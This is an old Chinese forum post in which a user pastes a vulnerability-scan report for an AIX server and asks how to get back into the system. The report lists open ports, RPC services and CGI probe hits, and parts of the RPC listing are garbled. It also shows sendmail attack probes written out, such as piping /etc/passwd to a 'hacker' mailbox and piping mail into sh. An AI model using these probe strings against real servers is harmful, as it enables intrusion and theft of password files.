论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2003-03-07 18:05 |只看该作者 |倒序浏览

我的机器被扫描后，发现如下漏洞，而且我现在进不去系统了。
我该如何去做才能进入系统

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
9.185.56.126

主机信息

主机名:pss6000a.cn.ibm.com

9.185.56.126[数据未找到]

--------------------------------------------------------------------------------

路由表

跟踪路由->; 1 0 ms 0 ms 0 ms 9.181.10.3 【数据未找到】
跟踪路由->; 2 10 ms 10 ms 10 ms 9.181.2.5 【数据未找到】
跟踪路由->; 3 20 ms 20 ms 20 ms 9.185.56.126 【数据未找到】

--------------------------------------------------------------------------------

WEB服务信息检测

服务检测 SMTP->; 220 pss6000a ESMTP Sendmail AIX4.2/UCB 8.7; Fri, 7 Mar 2003 16:40:21 +0800 (TAIST)
服务检测 FTP->; 220 ps6000a FTP server (Version 4.1 Fri Oct 22 16:31:01 CDT 1999) ready.
服务检测 HTTP->; Apache/1.3.12 (Unix)

--------------------------------------------------------------------------------

FTP匿名检测

--------------------------------------------------------------------------------

SMTP检测

支持VRFY
支持EXPN
EXPN root ...OK
VRFY root ...OK
检测 SMTP->;9.185.56.126 501 HELO requires domain address
检测 SMTP->;9.185.56.126 检测debug漏洞 500 Command unrecognized
检测 SMTP->;9.185.56.126 检测kill漏洞 500 Command unrecognized
检测 SMTP->;9.185.56.126 检测wiz漏洞 500 Command unrecognized
检测 SMTP->;9.185.56.126 检测rcpt to: /tmp/.rhosts漏洞 503 Need MAIL before RCPT
检测 SMTP->;9.185.56.126 检测+ +漏洞 500 Command unrecognized
检测 SMTP->;9.185.56.126 检测RSET漏洞 250 Reset state
检测 SMTP->;9.185.56.126 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 553 |/bin/mail... Invalid sender address
检测 SMTP->;9.185.56.126 检测RSET漏洞 250 Reset state
检测 SMTP->;9.185.56.126 检测mail from: |tail|sh漏洞 553 |tail|sh... Invalid sender address

--------------------------------------------------------------------------------

FINGER检测

--------------------------------------------------------------------------------

RPC检测

Program no. Name Version Protocol Port

(100000) portmapper 4 TCP 111
(100000) portmapper 3 TCP 222
(100000) portmapper 2 TCP 333
(100000) portmapper 4 UDP 444
(100000) portmapper 3 UDP 555
(100000) portmapper 2 UDP 666
(100001) rstatd 1 UDP 1025
(100001) rstatd 2 UDP 1025
(100001) rstatd 3 UDP 1025
(100002) rusersd 1 UDP 1026
(100002) rusersd 2 UDP 1026
(10000

walld 1 UDP 1027
(100012) sprayd 1 UDP 1028
(150001) pcnfsd 1 UDP 1029
(150001) pcnfsd 2 UDP 1029
(100083) 1 TCP 1025
(10006

2 UDP 1030
(10006

3 UDP 1030
(10006

4 UDP 1030
(10006

5 UDP 1030
(300923) 1 TCP 1026
(100003) nfs 2 UDP 2049
(100003) nfs 3 UDP 2049
(100003) nfs 2 TCP 2049
(100003) nfs 3 TCP 2049
(200262) 1 UDP 2049
(200262) 1 TCP 2049
(100005) mountd 1 UDP 1042
(100005) mountd 2 UDP 1042
(100005) mountd 3 UDP 1042
(100005) mountd 1 TCP 1029
(100005) mountd 2 TCP 1029
(100005) mountd 3 TCP 1029
(100024) status 1 UDP 885
(100024) status 1 TCP 890
(200257) 1 UDP 894
(200257) 1 TCP 896
(200257) 2 TCP 896
(100021) nlockmgr 1 UDP 1061
(100021) nlockmgr 2 UDP 1061
(100021) nlockmgr 3 UDP 1061
(100021) nlockmgr 4 UDP 1061
(100021) nlockmgr 1 TCP 1030
(100021) nlockmgr 2 TCP 1030
(100021) nlockmgr 3 TCP 1030
(100021) nlockmgr 4 TCP 1030
(555000555) 3 TCP 884

--------------------------------------------------------------------------------

弱口令检测

--------------------------------------------------------------------------------

端口检测

13 [daytime]
25 [smtp]
80 [http]
23 [telnet]
513 [login]
21 [ftp]

--------------------------------------------------------------------------------

CGI/ASP漏洞

9.185.56.126/?PageServices
9.185.56.126/?wp-cs-dump
9.185.56.126/?wp-start-ver
9.185.56.126/?wp-stop-ver
9.185.56.126/?wp-html-rend
9.185.56.126/?wp-uncheckout
9.185.56.126/?wp-usr-prop
9.185.56.126/?wp-ver-diff
9.185.56.126/?wp-verify-link
9.185.56.126/?wp-ver-info

--------------------------------------------------------------------------------